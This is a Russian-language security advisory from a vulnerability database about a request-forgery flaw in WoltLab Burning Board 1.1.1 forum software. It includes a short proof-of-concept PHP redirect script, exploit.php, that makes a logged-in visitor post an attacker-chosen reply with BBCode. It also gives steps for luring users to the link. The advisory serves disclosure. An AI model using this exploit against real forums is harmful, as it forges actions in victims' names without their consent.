Манипуляция параметрами в Burning Board

Дата публикации:
17.04.2002
Дата изменения:
17.10.2006
Всего просмотров:
2060
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание:

Burning Board - программное обеспечение Web форума разработанное в PHP+MySQL для Windows и Unix.
Нападающий может создавать злонамеренную ссылку, которая способна к порождению действий, которые будут выполнены в контексте законного пользователя Burning Board, посетившего эту ссылку. Законный пользователь форума должен также быть заверен через опознавательный мандат на основе куки. Злонамеренная ссылка может включать BBCode.
Другие Web форумы (типа phpBB), могут быть также уязвимы к этой проблеме.
Уязвимость найдена в Woltlab Burning Board 1.1.1

Пример:
1. Создаем сценарий exploit.php
exploit.php // with php U can dynamically redirect to the same treads & boardid (parsing $HTTP_REFERER)
<?php
header ("Location:
http://localhost/wbboard/reply.php?threadid=7&boardid=58&action=send&subject=check%20this%20out&message=test[IMG]http://localhost/~seazon/art/
eros/236.jpg[/IMG]&signature=1"); /* Redirect browser*/
?>
2. Регистрируемся в форуме.
3. Посылаем сообщение:
Hey, I know how to exploit this forum [URL]http://host.com/exploit.php[/URL]"
 



Ссылки: Источник
или введите имя

CAPTCHA